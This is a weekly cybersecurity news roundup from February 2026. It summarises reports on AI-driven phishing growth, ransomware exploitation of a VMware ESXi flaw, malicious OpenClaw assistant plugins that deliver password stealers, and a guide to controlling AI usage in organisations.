**Weekly Cybersecurity Roundup for the Week of February 6, 2026**
This week’s security roundup spotlights how AI is turbocharging the threat landscape—phishing volumes have more than doubled as attackers weaponize polymorphic campaigns and local-language lures. CISA also confirmed active ransomware exploitation of a critical VMware ESXi sandbox escape, raising urgency for lagging patch programs. Researchers uncovered hundreds of malicious “skills” in the OpenClaw AI assistant ecosystem distributing password stealers to Windows and macOS users. We close with a practical buyer’s guide to AI usage control to help teams rein in shadow AI, protect sensitive data, and stay compliant.
AI Drives Doubling of Phishing Attacks in a Year
A new report from Cofense reveals that the volume of phishing attacks has more than doubled in the last year, driven largely by the widespread adoption of artificial intelligence by cybercriminals.
In 2025, security filters detected a phishing email every 19 seconds, a significant jump from the 2024 rate of one every 42 seconds. Threat actors are now using AI as a core capability to create “polymorphic” campaigns that dynamically alter logos, wording, and URLs to evade detection, while also generating near-flawless emails in local languages. Additionally, the report notes a 105% surge in the use of Remote Access Tools (RATs) and a rise in “conversational” phishing attacks, which bypass traditional filters by omitting malicious links or attachments entirely.
This rapid evolution of AI-enhanced threats underscores the critical need for organizations to move beyond static perimeter defenses and adopt behavioral analysis and human validation strategies to identify these increasingly sophisticated attacks.
Read the original article here
CISA: VMware ESXi Flaw Now Exploited in Ransomware Attacks
Summary
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has confirmed that ransomware gangs are actively exploiting a critical sandbox escape vulnerability in VMware ESXi systems.
Key Points
- The vulnerability (CVE-2025-22225) allows attackers with specific privileges to execute an arbitrary kernel write, enabling them to escape the virtual machine sandbox and compromise the host system.
- Although Broadcom released a patch for this flaw in March 2025, investigations suggest threat actors may have been exploiting it as a zero-day vulnerability as far back as February 2024.
- CISA has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog and ordered federal agencies to secure their systems by late March 2025 to prevent further compromise.
Why It Matters
Because VMware ESXi is widely used in enterprise environments to host critical servers and data, this active exploitation represents a severe risk for organizations that have not yet applied the available patches, potentially leading to widespread ransomware infections.
Read the original article here
Malicious Skills in OpenClaw AI Assistant Distribute Malware
Summary:
Security researchers have discovered over 230 malicious “skills” (plugins) uploaded to the official registry of the OpenClaw AI assistant (formerly Moltbot) that are designed to distribute password-stealing malware. These malicious packages disguise themselves as legitimate financial or cryptocurrency tools but actually contain a malware delivery mechanism known as “AuthTool.” When users install and follow the documentation for these skills, they inadvertently download stealers capable of extracting sensitive data such as API keys, SSH credentials, and browser passwords on both Windows and macOS systems.
Why It Matters:
This campaign demonstrates the growing risk associated with the open-source AI ecosystem, where unvetted third-party extensions can easily compromise the security of users who grant these assistants deep system access.
Read the original article here
A Buyer’s Guide to Navigating AI Usage Control
As organizations increasingly adopt generative AI, controlling its usage has become a critical security priority to prevent data leakage and ensure compliance. This guide outlines essential strategies for managing AI risks, such as implementing visibility tools to track shadow AI usage and enforcing policies that restrict sensitive data from being shared with public AI models. It emphasizes the importance of a comprehensive approach that includes discovering all AI applications in use, assessing their risk levels, and applying granular controls based on user roles and data sensitivity.
By adopting these measures, businesses can safely leverage the productivity benefits of AI while protecting their intellectual property and adhering to regulatory standards.